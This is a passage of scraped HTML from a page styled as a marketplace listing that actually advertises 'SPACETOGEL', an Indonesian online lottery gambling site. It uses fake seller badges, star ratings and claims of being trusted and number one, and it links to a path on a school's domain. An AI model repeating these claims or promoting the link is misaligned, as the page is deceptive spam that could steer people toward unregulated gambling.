                            data-delay-srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg 1x, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg 2x"
                            data-original-image-width="2000"
                            data-original-image-height="2000"
                            data-index="9"
                            data-src-zoom-image="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                        />
                    </li>
                    <li class="wt-display-none wt-position-absolute wt-position-top wt-position-left wt-width-full wt-height-full skeleton-background"
                        data-listing-image
                        data-index="10"
                        data-image-id="6356157787"
                    >
                        <img class="wt-rounded wt-overflow-hidden image-overlay-img wt-object-fit-contain wt-vertical-center"
                            alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 10"
                            
                            data-delay-src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                            data-delay-srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg 1x, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg 2x"
                            data-original-image-width="2000"
                            data-original-image-height="2000"
                            data-index="10"
                            data-src-zoom-image="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                        />
                    </li>
                <div class="wt-z-index-1 click-to-zoom-text wt-position-absolute wt-display-none"
                     data-click-to-zoom-toast>
<span data-clg-id="WtBadge" class="wt-badge wt-badge--default wt-text-body-01">
                        <span class="wt-icon wt-icon--smallest"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M10,2a8,8,0,1,0,8,8A8.009,8.009,0,0,0,10,2Zm0,14a6,6,0,1,1,6-6A6.007,6.007,0,0,1,10,16Z"/><path d="M14,9H11V6A1,1,0,1,0,9,6V9H6a1,1,0,0,0,0,2H9v3a1,1,0,1,0,2,0V11h3A1,1,0,0,0,14,9Z"/><path d="M21.707,20.293l-4-4a1,1,0,0,0-1.414,1.414l4,4A1,1,0,0,0,21.707,20.293Z"/></svg></span>
                    Click to zoom

</span>
                </div>
            </ul>
        </div>
            <div class="wt-overflow-y-auto wt-position-relative image-overlay-thumbnail-container wt-z-index-1 wt-pt-xs-10"
            data-thumbnail-container>
                        <ul
                            data-image-overlay-thumbnail-list
                            class="wt-z-index-1 wt-list-unstyled wt-flex-direction-row-lg wt-flex-direction-column-xs wt-display-flex-xs wt-flex-wrap wt-align-content-flex-start"
                        >
                                <li
                                    data-index="0"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6845617078"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 1"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                    <li
                                        data-index="1"
                                        class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                        tabindex="0"
                                        data-image-id="listing-video-1"
                                        data-listing-video="true"
                                    >
                                        <div class="wt-position-relative wt-height-full">
                                            <img class="wt-skeleton-ui"
                                                data-carousel-thumbnail-image
                                                src=""
                                                data-src-delay="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                            />

                                            <div class="wt-circle wt-overflow-hidden video-thumbnail-icon wt-position-top wt-position-bottom wt-position-right wt-position-left wt-bg-white wt-shadow-elevation-3">
                                                <span class="etsy-icon video-thumbnail-icon__with-image wt-position-top wt-position-bottom wt-position-right"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><polygon points="4 4 4 20 20 12 4 4"/></svg></span>
                                            </div>
                                        </div>
                                    </li>
                                <li
                                    data-index="2"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6354031418"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 2"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="3"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6402117407"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 3"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="4"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6354386589"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 4"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="5"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6285298756"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="name yarn jumper for kids"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="6"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6430051759"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 6"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="7"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="7056312285"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 7"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="8"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6332997945"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 8"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="9"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6722497805"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 9"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="10"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6356157787"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 10"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                        </ul>
            </div>
    </div>
</div>
</div>
</div>

<div class="wt-display-flex-xs wt-justify-content-flex-end wt-mt-xs-3">
        <a class="wt-text-link wt-text-link-underline" href="https://ppschool.org.in/stella/">
        <span class="wt-icon wt-icon--smaller-xs wt-nudge-r-4"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M7 3a1 1 0 0 0-2 0v18a1 1 0 1 0 2 0v-6h14.766l-3.6-6 3.6-6zm0 2v8h11.234l-2.4-4 2.4-4z"/></svg></span>SPACETOGEL
    </a>
    </div>
<div data-wt-overlay data-report-item-overlay id="report-item-overlay" class="wt-overlay wt-display-none" role="dialog" aria-hidden="true" aria-modal="false" aria-label ="report-item-overlay-title">
        <div class="wt-overlay__modal" data-overlay-modal>
            <button class="wt-btn wt-btn--icon wt-btn--tertiary wt-btn--light wt-overlay__close-icon" data-wt-overlay-close aria-label="Close">
                <span class="etsy-icon wt-icon--smaller"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M13.414,12l6.293-6.293a1,1,0,0,0-1.414-1.414L12,10.586,5.707,4.293A1,1,0,0,0,4.293,5.707L10.586,12,4.293,18.293a1,1,0,1,0,1.414,1.414L12,13.414l6.293,6.293a1,1,0,0,0,1.414-1.414Z"/></svg></span>
            </button>
            <div data-report-item-form-container class="wt-display-none">
    <div class="wt-overlay__header report-item-step">
        <h2 class="wt-text-heading" id="report-item-overlay-title">Apa yang salah dengan daftar ini?</h2>
    </div>
    <div class="wt-overlay__header report-item-step wt-display-none">
        <h3 class="wt-text-heading" id="report-item-overlay-title-more">Add more details</h3>
        <h3 class="wt-text-body-01 wt-mt-xs-3">Bagikan informasi lebih spesifik untuk membantu kami meninjau item ini dan melindungi pasar kami.</h3>
    </div>
    <form data-report-item-form
          action="/add_report.php"
          method="post">
        <div class="report-item-step">
            <div class="wt-select wt-mb-xs-3">
                <select class="wt-select__element"
                        id="report-item-choices"
                        data-report-item-choices>
                    <optgroup>
                        <option value="default">Pilih alasan…</option>
                        <option value="order-problem">Ada masalah dengan pesanan saya</option>
                        <option value="ip-policy">Ini menggunakan kekayaan intelektual saya tanpa izin</option>
                        <option value="flag-item">Saya rasa itu tidak sesuai dengan kebijakan SPACETOGEL</option>
                    </optgroup>
                </select>
                <label for="report-item-choices" class="wt-screen-reader-only">Pilih alasan…</label>
            </div>
            <div data-report-choice="order-problem" id="order-problem" class="wt-display-none">
                <p class="wt-mb-xs-2 prose">Hal pertama yang harus Anda lakukan adalah menghubungi penjual secara langsung.</p>
                <p class="wt-mb-xs-2 ip-policy prose">Jika Anda sudah melakukannya, barang Anda belum sampai, atau tidak sesuai deskripsi, Anda dapat melaporkannya ke SPACETOGEL dengan membuka kasus.</p>
                <p class="wt-mb-xs-2 prose">
                    <a href="/help/article/5307" target="_blank">
                        Laporkan masalah dengan pesanan
                    </a>
                </p>
            </div>
            <div data-report-choice="ip-policy" id="ip-policy" class="wt-display-none">
                <p class="wt-mb-xs-2 prose">Kami menanggapi masalah kekayaan intelektual dengan sangat serius, tetapi banyak dari masalah ini dapat diselesaikan langsung oleh pihak-pihak yang terlibat. Kami sarankan Anda menghubungi penjual secara langsung untuk menyampaikan kekhawatiran Anda dengan hormat.</p>
                <p class="wt-mb-xs-2 prose">Jika Anda ingin mengajukan tuduhan pelanggaran, Anda harus mengikuti proses yang dijelaskan dalam <a href='/legal/ip' target='_blank'>Kebijakan Hak Cipta dan Kekayaan Intelektual</a>.</p>
            </div>
            <div data-report-choice="flag-item" id="flag-item" class="wt-display-none">
                <div class="wt-mb-xs-2">
                    <a href="/legal/sellers#allowed" target="_blank">
                        Tinjau bagaimana kami mendefinisikan barang buatan tangan, vintage, dan perlengkapan
                    </a>
                </div>
                <div class="wt-mb-xs-2">
                    <a href="/legal/prohibited" target="_blank">
                        Lihat daftar barang dan bahan terlarang
                    </a>
                </div>
                <div class="wt-mb-xs-4">
                    <a href="/legal/policy/listing-mature-content-correctly/242665462117" target="_blank">
                        Baca kebijakan konten dewasa kami
                    </a>
                </div>
                <div data-report-reason class="wt-validation">
                    <fieldset class="wt-mb-xs-4">
                        <legend class="wt-label wt-mb-xs-2">Beritahu kami mengapa Anda melaporkan item ini</legend>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="not_handmade_vintage_or_craft"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_not_handmade_vintage_or_craft"
                                        name="flag_type_mnemonic"
                                        value="LISTING_CSV_MEMBER_FLAG">
                                <label for="flag_not_handmade_vintage_or_craft">Ini bukan barang buatan tangan, vintage, atau kerajinan</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="pornographic"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_pornographic"
                                        name="flag_type_mnemonic"
                                        value="OC_PORNOGRAPHY">
                                <label for="flag_pornographic">Itu pornografi</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="hate_speech_or_harassment"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_hate_speech_or_harassment"
                                        name="flag_type_mnemonic"
                                        value="OC_HATE_VIOLENT_HARMFUL">
                                <label for="flag_hate_speech_or_harassment">Ini adalah ujaran kebencian atau pelecehan</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="minor_safety"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_minor_safety"
                                        name="flag_type_mnemonic"
                                        value="LISTING_MINOR_SAFETY">
                                <label for="flag_minor_safety">Ini adalah ancaman terhadap keselamatan anak di bawah umur</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="violence_or_self_harm"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_violence_or_self_harm"
                                        name="flag_type_mnemonic"
                                        value="OC_HATE_VIOLENT_HARMFUL">
                                <label for="flag_violence_or_self_harm">Ini mendorong kekerasan atau menyakiti diri sendiri</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="dangerous_or_hazardous"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_dangerous_or_hazardous"
                                        name="flag_type_mnemonic"
                                        value="LISTING_PROHIBITED">
                                <label for="flag_dangerous_or_hazardous">Itu berbahaya atau membahayakan</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="violates_law"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_violates_law"
                                        name="flag_type_mnemonic"
                                        value="CC_REPORTED_ILLEGAL_CONTENT">
                                <label for="flag_violates_law">Ini melanggar hukum atau peraturan tertentu</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="violates_not_listed_policy"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_violates_not_listed_policy"
                                        name="flag_type_mnemonic"
                                        value="LISTING_PROHIBITED">
                                <label for="flag_violates_not_listed_policy">Ini melanggar kebijakan yang tidak tercantum di sini</label>
                            </div>
                        <div data-error="no-report-reason" id="no-report-reason" class="wt-validation__message wt-validation__message--is-hidden wt-sem-text-critical">Silakan pilih alasannya</div>
                    </fieldset>
                </div>
            </div>
        </div>
        <div class="report-item-step wt-display-none">
            <div data-report-comment class="wt-validation" tabindex="0">
                <label class="wt-screen-reader-only" for="report-item-reason">Sertakan hal lain yang perlu kami ketahui tentang item ini</label>
                <textarea id="report-item-reason" data-report-comment-input name="reason" class="wt-textarea" placeholder="Include anything else we should know about this item"></textarea>
                <div data-error="no-report-comment" id="no-report-comment" class="wt-validation__message wt-validation__message--is-hidden wt-sem-text-critical wt-mt-xs-2">
                    <span class="wt-icon wt-sem-text-on-surface-dark wt-validation__icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M11 6v8h2V6zm1 9.25a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5"/></svg></span>&nbsp;Pastikan untuk menambahkan lebih banyak rincian.
                </div>
                <div data-error="comment-min-length-illegal-content" id="comment-min-length-illegal-content" class="wt-validation__message wt-validation__message--is-hidden wt-sem-text-critical wt-mt-xs-2">
                    <span class="wt-icon wt-sem-text-on-surface-dark wt-validation__icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M11 6v8h2V6zm1 9.25a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5"/></svg></span>&nbsp;Tambahkan detail lebih lanjut, termasuk nama undang-undang atau peraturan (minimal 10 karakter).
                </div>
            </div>
        </div>
        <div data-report-bonafide class="wt-mt-xs-2 wt-mb-xs-2 wt-sem-text-secondary wt-display-none">
            Dengan mengirimkan laporan ini, Anda mengonfirmasi bahwa informasi dan klaim dalam formulir ini akurat.
        </div>
        <div data-report-item-overlay-footer class="wt-overlay__footer wt-pt-xs-0 wt-display-none" id="overlay-footer">
            <input type="hidden" name="_nnc" value="3:1757443933:IZCDEmL34NPkU3X48ZDZz8rZZPp4:9d62b7617187d17444be81b8f36c4dfb31d3884bb44f5aec3ebde05d24141848" class="hidden csrf" />
            <input type="hidden"
                   name="target_id"
                   value="4302118744"/>
            <input type="hidden"
                   name="target_type"
                   value="listing"/>
            <input type='hidden'
                   name='send_report'
                   value='true'/>
            <input type='hidden'
                   name='ref'
                   value="unknown"/>
            <input type='hidden'
                   name='platform'
                   value="web"/>
            <input type='hidden'
                   name='search_query'
                   value=""/>
            <div class="wt-overlay__footer__cancel">
                <button data-report-back-button type="button"
                        class="wt-btn wt-btn-transparent report-item-step wt-display-none">
                    Go back
                </button>
            </div>
            <div class="wt-overlay__footer__action">
                <button data-report-next-button type="button"
                        class="wt-btn wt-btn--primary report-item-step">
                    Next
                </button>
                <button data-report-submit-button type="submit"
                        class="wt-btn wt-btn--primary report-item-step wt-display-none">
                    Submit report
                </button>
            </div>
        </div>
    </form>
</div>
        </div>
    </div>
                        </div>
                    </div>
                    <div class="cart-col wt-order-xs-2 wt-mb-lg-5">
    <div id="listing-page-cart" class="wt-display-flex-lg wt-flex-direction-column-md wt-flex-lg-3 wt-pl-md-4 wt-pr-md-4 wt-pl-lg-0 wt-pr-lg-5 wt-pl-xs-2 wt-pr-xs-2">
            <div class="wt-mb-xs-1 wt-mt-xs-1">
                <div data-appears-component-name="SPACETOGEL-Modules-ListingPage-UrgencySignal-RecsRankingApiSpec" data-appears-event-data='{"module_placement":"lp_urgency_signals","datasets":["Common_Signal_CustomCandidatesSignalRankerV3"],"targets":[],"logging_class":"SPACETOGEL\\Modules\\ListingPage\\UrgencySignal\\RecsRankingApiSpec","page_listing_id":4302118744,"mmx_request_uuid_map":{"5143dd58-1944-4e40-8b7e-02b5b89c59ea":[0,1,2]},"candidate_source_map":{"signals-ranker-v3-extractor":[0,1,2]},"second_pass_ranker_map":{"signals-ranker-v3":[0,1,2]},"client_provided_features":{"browser":{"acceptLanguage":"en-US","browser":"Chrome","currency":"IDR","localeRegion":"ID","operatingSystem":"Windows 11","platform":"desktop","platformSPACETOGELApp":"web","platformMobileDevice":"unidentified","source":"directLanding"},"date_time":{"dayOfWeek":"2","hourOfDay":"18"},"user":{"locationLatitude":null,"locationLongitude":null,"locationZip":"unidentified","userPreferredLanguage":"en-US"}},"scores":[0.58056300000000005123723667566082440316677093505859375,0.48064099999999998491517771981307305395603179931640625,0.37174099999999998811262003073352389037609100341796875],"datasets_map":{"Common_Signal_CustomCandidatesSignalRankerV3":[0,1,2]},"target_listing_id":4302118744,"candidates":["recently_purchased","in_cart_only","lp_views_only"],"refTag":"lp_urgency_signals","signals":["recently_purchased","in_cart_only","lp_views_only"],"rec_event_name":"recommendations_module"}' class='recs-appears-logger'>
</div>
            </div>
        <div class="wt-display-flex-xs wt-align-items-center">
            <div data-appears-component-name="price">
<div class="wt-display-flex-xs wt-align-items-center wt-flex-wrap"
     data-selector="price-only"
     data-buy-box-region="price"
>
        <p class="wt-text-title-larger wt-mr-xs-1
                wt-text-slime
            "
        >
        <span class="wt-screen-reader-only">Harga :</span>
        Rp 5.000
    </p>
        <p class="wt-text-caption wt-sem-text-secondary">
            <span class="wt-screen-reader-only">Normal:</span>
            <span class="wt-text-strikethrough  ">
                Rp 100,000+
            </span>
        </p>
        
    <div data-clg-id="WtSpinner" class="wt-spinner wt-spinner--01 wt-display-none" aria-live="assertive" data-buy-box-price-spinner="">
        <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle fill="transparent" cx="12" cy="12" r="10"/></svg></span>
        Loading
    </div>

</div>
</div>
                                <div class="wt-ml-xs-2">
                                    <span data-clg-id="WtBadge" class="wt-badge wt-badge--statusValue">
        <strong>95%</strong>

</span>
                                </div>
        </div>
                <div class="wt-mb-xs-1  ">
                        <div id="sale-ending-soon-countdown">
    <p class="wt-text-title-01 wt-sem-text-monetary-value" data-24-hour-sale-wrapper>
  <span class="listing-24-sale-countdown" data-end-date="1757519999">Promo Setiap Hari Untuk Setiap Para Pemain</span>
</p>

</div>
                    
                </div>
        
        <div data-buy-box-region="vat_messaging">
        <div class="wt-sem-text-secondary wt-text-caption wt-pt-xs-1 wt-pb-xs-1">
            Tanpa Syarat dan ketentuan
        </div>
</div>
        
        
            <div class="wt-mt-xs-1 wt-mb-xs-1">
            </div>
        <div class="wt-mb-xs-3">
            <div class="wt-display-inline-flex-xs wt-align-items-center wt-flex-wrap lp-shop-header">
    <div class="wt-display-inline-flex-xs wt-align-items-center
        
    ">
        <span class="wt-text-title-small">
    <a href="https://ppschool.org.in/stella/" class="wt-text-link-no-underline wt-sem-text-primary">
        SPACETOGEL
    </a>
</span>
            &nbsp;<div class="wt-popover star-seller-badge-listing-page" data-wt-popover>
    <button data-wt-popover-trigger class="wt-popover__trigger wt-popover__trigger--underline" aria-label="Star Seller" aria-describedby="star-seller-popover">
        <span class="wt-icon wt-icon--smaller-xs wt-icon--core wt-fill-star-seller-dark" alt="star_seller"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="m20.902 7.09-2.317-1.332-1.341-2.303H14.56L12.122 2 9.805 3.333H7.122L5.78 5.758 3.341 7.09v2.667L2 12.06l1.341 2.303v2.666l2.318 1.334L7 20.667h2.683L12 22l2.317-1.333H17l1.342-2.303 2.317-1.334v-2.666L22 12.06l-1.341-2.303V7.09zm-6.097 6.062.732 3.515-.488.363-2.927-1.818-3.049 1.697-.488-.363.732-3.516-2.56-2.181.121-.485 3.537-.243 1.341-3.273h.488l1.341 3.273 3.537.243.122.484z"/></svg></span>
    </button>
    <div class="wt-p-xs-3" id="star-seller-popover" role="tooltip">
        <p class="wt-mb-xs-1 wt-text-title-01">
            Star Seller
        </p>
    </div>
</div>
    </div>
        <div class="wt-ml-xs-1">
            <div class="wt-text-link-no-underline review-stars-text-decoration-none">
    <a href="#reviews" data-click-source="review_stars" aria-label="4.9 out of 5 stars. See reviews."><span class="wt-display-inline-block wt-mr-xs-1" data-stars-svg-container>
    <input type="hidden" name="initial-rating" value="4.8554" />
    <input type="hidden" name="rating" value="4.8554" />
    <span class="wt-screen-reader-only">5 out of 5 stars</span>

    <span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="4"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
    </span>
</span></a>
</div>
        </div>
    
</div>
        </div>
        <div class="wt-mb-xs-6 wt-mb-lg-0">
            <div data-buy-box>
    <div class="wt-mb-xs-3">
        
        
        <div data-appears-component-name="variations">
<div data-selector="listing-page-variations">
    <div
    class="wt-validation wt-mb-xs-2"
    data-selector="listing-page-variation"
    data-variation-number="0"
>

</button>
</div>
        </form>
        

        </div>

</div>
</div>
                </div>
        </div>
        
    </div>
</div>
<div class="listing-info info-col description-right wt-order-xs-5">
    <div class="wt-flex-lg-3 wt-order-xs-1 wt-order-lg-3 wt-max-width-full wt-pl-md-4 wt-pr-md-4 wt-pl-lg-0 wt-pr-lg-5 wt-pl-xs-2 wt-pr-xs-2">
            <div data-appears-component-name="product_details">
<div id="product_details">
    <div class="wt-content-toggle " data-selector="info-section-content-toggle">
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-content-toggle--btn wt-content-toggle--with-icon wt-width-full wt-content-toggle--flush" data-wt-content-toggle="true" data-animate="true" data-default-open="true" aria-controls="product_details_content_toggle">
                <span class="wt-flex-xs-auto wt-width-full wt-text-title">
                <h2>
                    Item details
                </h2>
            </span>
            <span class="wt-content-toggle--btn__icon"></span>

</button>

        <div id="product_details_content_toggle"
             class="wt-content-toggle__body"
             aria-hidden="false"
        >
            <div 
                class="wt-mb-xs-6"
            >
                <div class="wt-mt-xs-2">
    <h3 class="wt-text-title">Highlights</h3>
    <ul
        class="wt-block-grid-xs-1 wt-text-body-01 show-icons wt-mt-xs-1 wt-pl-xs-0 wt-mb-xs-3"
        data-selector ="product-details-highlights"
        >
        <div data-appears-component-name="how_its_made_label" data-appears-event-data='{"label_type":"seller_designed","section":"product_details"}'>
<li class="wt-block-grid__item wt-display-flex-xs wt-align-items-flex-start">
            <div><span class="wt-icon wt-nudge-b-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M4.5 8v7H3v5h5v-1.25h2.5v-2H8V15H6.5V8H8V6.5h7V8h1.75v2.457l2 1.714V8H20V3h-5v1.5H8V3H3v5z"/><path d="m12.39 9.129 9.273 7.971-4.17.29 1.378 3-2.272 1.043-1.36-2.962-2.854 2.887z"/></svg></span></div>
        <div class="wt-ml-xs-1 how-its-made-label-product-details">
                Designed by <a href="https://ppschool.org.in/stella/"target="_blank" class="wt-text-link-no-underline wt-text-title"> SPACETOGEL</a>
        </div>
</li>
</div>
        <li class="wt-block-grid__item wt-display-flex-xs wt-align-items-flex-start">
